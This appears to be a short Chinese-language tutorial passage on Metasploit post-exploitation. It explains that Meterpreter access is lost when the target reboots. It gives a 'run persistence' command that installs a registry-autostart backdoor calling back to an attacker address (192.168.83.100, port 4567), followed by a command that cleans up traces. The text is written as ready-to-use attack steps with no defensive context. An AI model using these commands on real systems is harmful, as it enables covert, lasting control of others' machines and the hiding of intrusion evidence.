meterpreter的shellcode仅仅驻留在内存当中,那么当靶机重启,意味这我们会失去控制权,因此我们需要继续植入持久型的后门。
利用persistence后渗透攻击模块长期控制
执行
run persistence -X -i 5 -p 4567 -r 192.168.83.100植入持久性后门,通过修改注册表达到自启动的目的,-i参数为方向连接间隔,-X表示选择开机自启动。与此同时,还生成了清理文件,可通过命令
run multi_console_command -r [文件路径]清除痕迹
网友评论